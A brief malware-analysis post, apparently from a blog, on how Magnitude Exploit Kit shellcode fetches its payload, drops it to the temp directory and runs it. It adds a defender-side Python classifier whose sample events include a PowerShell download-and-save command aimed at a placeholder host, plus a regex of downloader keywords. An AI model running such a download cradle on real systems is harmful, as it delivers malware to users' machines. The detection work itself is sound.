Magnitude Exploit Kit has been observed downloading its shellcode in a separate stream, in cleartext. Snapshot from Wireshark below:
Post exploitation, the shellcode starts executing. When it starts, it harvests all the APIs it needs. Below is the list of APIs gathered and pushed to the stack for later use.
The payload is always downloaded to the location below on the local machine (the current user's temp directory).
It then downloads the payload and executes it through the "CreateProcessA" API. The shellcode has also been observed using PowerShell to download and execute the payload.
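As an added defender-side example (not code from the original post): a small Python classifier that applies the two behaviours described above, a browser spawning an executable from the user's temp directory and PowerShell being used as the downloader, to process-creation events. The event fields, detection labels, sample paths and URL are assumptions, and the sample events are constructed.

```python
import re
from typing import Dict, List

# A user temp directory, e.g. C:\Users\alice\AppData\Local\Temp\x.exe
USER_TEMP_RE = re.compile(r"\\users\\[^\\]+\\appdata\\local\\temp\\", re.IGNORECASE)
# Strings that commonly appear when PowerShell is used as a downloader
PS_DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|net\.webclient|start-bitstransfer",
    re.IGNORECASE)
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> List[str]:
    """Return the detection labels that apply to one process-creation event."""
    hits: List[str] = []
    image = event.get("image", "")
    cmd = event.get("command_line", "")
    parent_is_browser = basename(event.get("parent_image", "")) in BROWSERS
    # Payload dropped to %TEMP% and launched (CreateProcessA called from the browser)
    if parent_is_browser and USER_TEMP_RE.search(image):
        hits.append("browser_spawned_temp_executable")
    # PowerShell used to fetch and run the payload
    if basename(image) == "powershell.exe" and PS_DOWNLOAD_RE.search(cmd):
        hits.append("powershell_download_cradle")
        if parent_is_browser:
            hits.append("browser_spawned_powershell")
    return hits

def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map each event id to its detection labels."""
    return {int(e["id"]): classify(e) for e in events}

# Constructed sample events (not real telemetry); paths and URL are placeholders.
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": "1", "parent_image": IE, "image": r"C:\Users\alice\AppData\Local\Temp\a.exe",
     "command_line": r"C:\Users\alice\AppData\Local\Temp\a.exe"},
    {"id": "2", "parent_image": IE, "image": PS,
     "command_line": "powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
                     ".DownloadFile('http://example.invalid/x', 'x.exe')\""},
    {"id": "3", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell.exe -c Get-ChildItem C:\\Temp"},
    {"id": "4", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

Events 1 and 2 are flagged; the administrator's PowerShell and notepad events produce no labels.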
Can you please share the pcap? Thanks.
@pwnslinger you can download from http://malware-traffic-analysis.net
It has loads of pcaps for Magnitude and other kits.